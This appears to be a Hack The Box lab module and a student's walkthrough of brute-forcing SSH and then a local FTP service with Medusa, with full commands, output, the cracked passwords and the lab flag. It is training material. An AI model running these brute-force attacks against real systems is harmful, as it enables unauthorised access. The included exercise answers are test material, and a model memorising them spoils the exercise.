Web Services with Medusa
In the dynamic landscape of cybersecurity, maintaining robust authentication mechanisms is paramount. While technologies like Secure Shell (SSH) and File Transfer Protocol (FTP) facilitate secure remote access and file management, they are often reliant on traditional username-password combinations, presenting potential vulnerabilities exploitable through brute-force attacks. In this module, we will delve into the practical application of Medusa, a potent brute-forcing tool, to systematically compromise both SSH and FTP services, thereby illustrating potential attack vectors and emphasizing the importance of fortified authentication practices.
SSH is a cryptographic network protocol that provides a secure channel for remote login, command execution, and file transfers over an unsecured network. Its strength lies in its encryption, which makes it significantly more secure than unencrypted protocols like Telnet. However, weak or easily guessable passwords can undermine SSH's security, exposing it to brute-force attacks.
FTP is a standard network protocol for transferring files between a client and a server on a computer network. It's also widely used for uploading and downloading files from websites. However, standard FTP transmits data, including login credentials, in cleartext, rendering it susceptible to interception and brute-forcing.
Kick-off
We begin our exploration by targeting an SSH server running on a remote system. Assuming prior knowledge of the username sshuser, we can leverage Medusa to attempt different password combinations until successful authentication is achieved systematically.
The following command serves as our starting point:
m4cc18@htb[/htb]$ medusa -h <IP> -n <PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3
Let's break down each component:
-h <IP>: Specifies the target system's IP address.-n <PORT>: Defines the port on which the SSH service is listening (typically port 22).-u sshuser: Sets the username for the brute-force attack.-P 2023-200_most_used_passwords.txt: Points Medusa to a wordlist containing the 200 most commonly used passwords in 2023. The effectiveness of a brute-force attack is often tied to the quality and relevance of the wordlist used.-M ssh: Selects the SSH module within Medusa, tailoring the attack specifically for SSH authentication.-t 3: Dictates the number of parallel login attempts to execute concurrently. Increasing this number can speed up the attack but may also increase the likelihood of detection or triggering security measures on the target system.
m4cc18@htb[/htb]$ medusa -h IP -n PORT -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
...
ACCOUNT FOUND: [ssh] Host: IP User: sshuser Password: 1q2w3e4r5t [SUCCESS]
Upon execution, Medusa will display its progress as it cycles through the password combinations. The output will indicate a successful login, revealing the correct password.
Gaining Access
With the password in hand, establish an SSH connection using the following command and enter the found password when prompted:
m4cc18@htb[/htb]$ ssh sshuser@<IP> -p PORT
This command will initiate an interactive SSH session, granting you access to the remote system's command line.
Expanding the Attack Surface
Once inside the system, the next step is identifying other potential attack surfaces. Using netstat (within the SSH session) to list open ports and listening services, you discover a service running on port 21.
m4cc18@htb[/htb]$ netstat -tulpn | grep LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
Further reconnaissance with nmap (within the SSH session) confirms this finding as an ftp server.
m4cc18@htb[/htb]$ nmap localhost
Starting Nmap 7.80 ( https://nmap.org ) at 2024-09-05 13:19 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000078s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 998 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds
Targeting the FTP Server
Having identified the FTP server, you can proceed to brute-force its authentication mechanism.
If we explore the /home directory on the target system, we see an ftpuser folder, which implies the likelihood of the FTP server username being ftpuser. Based on this, we can modify our Medusa command accordingly:
m4cc18@htb[/htb]$ medusa -h 127.0.0.1 -u ftpuser -P 2020-200_most_used_passwords.txt -M ftp -t 5
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
GENERAL: Parallel Hosts: 1 Parallel Logins: 5
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 197
...
ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: ... Password: ... [SUCCESS]
...
GENERAL: Medusa has finished.
The key differences here are:
-h 127.0.0.1: Targets the local system, as the FTP server is running locally. Using the IP address tells medusa explicitly to use IPv4.-u ftpuser: Specifies the usernameftpuser.-M ftp: Selects the FTP module within Medusa.-t 5: Increases the number of parallel login attempts to 5.
Retrieving The Flag
Upon successfully cracking the FTP password, establish an FTP connection. Within the FTP session, use the get command to download the flag.txt file, which may contain sensitive information.:
m4cc18@htb[/htb]$ ftp ftp://ftpuser:<FTPUSER_PASSWORD>@localhost
Output:
Trying [::1]:21 ...
Connected to localhost.
220 (vsFTPd 3.0.5)
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||25926|)
150 Here comes the directory listing.
-rw------- 1 1001 1001 35 Sep 05 13:17 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||37251|)
150 Opening BINARY mode data connection for flag.txt (35 bytes).
100% |***************************************************************************| 35 776.81 KiB/s 00:00 ETA
226 Transfer complete.
35 bytes received in 00:00 (131.45 KiB/s)
ftp> exit
221 Goodbye.
Then read the file to get the flag:
m4cc18@htb[/htb]$ cat flag.txt
HTB{...}
The ease with which such attacks can be executed underscores the importance of employing strong, unique passwords.
Exercise
TARGET: 154.57.164.83:31934
Challenge 1
What was the password for the ftpuser?
Discovery
Firs we attempt to brute force the ssh password for the given user: sshuser. To do this we use the following medusa command:
┌──(macc㉿kaliLab)-[~/htb/login_brute_forcing]
└─$ medusa -h 154.57.164.83 -n 31934 -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3
Output:
...
2026-04-02 11:08:42 ACCOUNT FOUND: [ssh] Host: 154.57.164.83 User: sshuser Password: 1q2w3e4r5t [SUCCESS]
2026-04-02 11:08:43 ACCOUNT CHECK: [ssh] Host: 154.57.164.83 (1 of 1, 0 complete) User: sshuser (1 of 1, 1 complete) Password: 12341234 (47 of 200 complete)
2026-04-02 11:08:43 ACCOUNT CHECK: [ssh] Host: 154.57.164.83 (1 of 1, 0 complete) User: sshuser (1 of 1, 1 complete) Password: Admin@123 (48 of 200 complete)
Note the only line that says ACCOUNT FOUND is:
2026-04-02 11:08:42 ACCOUNT FOUND: [ssh] Host: 154.57.164.83 User: sshuser Password: 1q2w3e4r5t [SUCCESS]
Therefore we have found the ssh password for the sshuser user. We can now proceed to start an ssh session using those credentials:
┌──(macc㉿kaliLab)-[~/htb/login_brute_forcing]
└─$ ssh sshuser@154.57.164.83 -p 31934
- It will prompt for the password we just found.
Output:
The authenticity of host '[154.57.164.83]:31934 ([154.57.164.83]:31934)' can't be established.
ED25519 key fingerprint is: SHA256:2DP/wThlQCF/4IvGaF49XZcQO0bREny3YAZ1wSonr2g
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[154.57.164.83]:31934' (ED25519) to the list of known hosts.
sshuser@154.57.164.83's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 6.18.9-talos x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
sshuser@ng-130206-loginbfservice-qsydl-774b66fdc-lb9t6:~$
- We are in!
Once inside the system, we identify other potential attack surfaces using the following command:
sshuser@ng-130206-loginbfservice-qsydl-774b66fdc-lb9t6:~$ netstat -tulpn | grep LISTEN
Output:
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
- For here we get that port 21 is open and listening, this port is usually attributed to FTP.
Let's make sure port 21 points to an FTP connection with a local nmap scan:
sshuser@ng-130206-loginbfservice-qsydl-774b66fdc-lb9t6:~$ nmap localhost
Output:
Starting Nmap 7.80 ( https://nmap.org ) at 2026-04-02 17:25 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00023s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 998 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
Now that we know we are facing an FTP server, we can check the /home directory to see if there are any users that may use ftp:
sshuser@ng-130206-loginbfservice-qsydl-774b66fdc-lb9t6:~$ ls -l /home/
Output:
total 0
drwx------. 2 ftpuser ftpuser 73 Apr 2 17:05 ftpuser
drwxr-xr-x. 1 sshuser sshuser 60 Apr 2 17:08 sshuser
ftpusermust be the user usingftp
Exploitation
Now that we know a possible user for the ftp server (ftpuser) we can craft a local medusa command to brute force the password for this user:
sshuser@ng-130206-loginbfservice-qsydl-774b66fdc-lb9t6:~$ medusa -h 127.0.0.1 -u ftpuser -P 2020-200_most_used_passwords.txt -M ftp -t 5
Output:
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
GENERAL: Parallel Hosts: 1 Parallel Logins: 5
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 197
...
ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: ftpuser Password: qqww1122 [SUCCESS]
ACCOUNT CHECK: [ftp] Host: 127.0.0.1 (1 of 1, 0 complete) User: ftpuser (1 of 1, 1 complete) Password: 1234 (17 of 197 complete)
ACCOUNT CHECK: [ftp] Host: 127.0.0.1 (1 of 1, 0 complete) User: ftpuser (1 of 1, 1 complete) Password: aaron431 (18 of 197 complete)
ACCOUNT CHECK: [ftp] Host: 127.0.0.1 (1 of 1, 0 complete) User: ftpuser (1 of 1, 1 complete) Password: iloveyou (19 of 197 complete)
ACCOUNT CHECK: [ftp] Host: 127.0.0.1 (1 of 1, 0 complete) User: ftpuser (1 of 1, 1 complete) Password: password1 (20 of 197 complete)
Note the line:
ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: ftpuser Password: qqww1122 [SUCCESS]
- This gives us our password!
flag: qqww1122
Challenge 2
After successfully brute-forcing the ssh session, and then logging into the ftp server on the target, what is the full flag found within flag.txt?
Having already an ftp user and password, we can start an ftp session to retrieve the flag, here is the command we need:
sshuser@ng-130206-loginbfservice-qsydl-774b66fdc-lb9t6:~$ ftp ftp://ftpuser:qqww1122@localhost
Output (using ls and get):
Trying [::1]:21 ...
Connected to localhost.
220 (vsFTPd 3.0.5)
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||25926|)
150 Here comes the directory listing.
-rw------- 1 1001 1001 35 Sep 05 13:17 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||37251|)
150 Opening BINARY mode data connection for flag.txt (35 bytes).
100% |***************************************************************************| 35 776.81 KiB/s 00:00 ETA
226 Transfer complete.
35 bytes received in 00:00 (131.45 KiB/s)
ftp> exit
221 Goodbye.
Then read the file to get the flag:
sshuser@ng-130206-loginbfservice-qsydl-774b66fdc-lb9t6:~$ cat flag.txt
Output:
HTB{SSH_and_FTP_Bruteforce_Success}
flag: HTB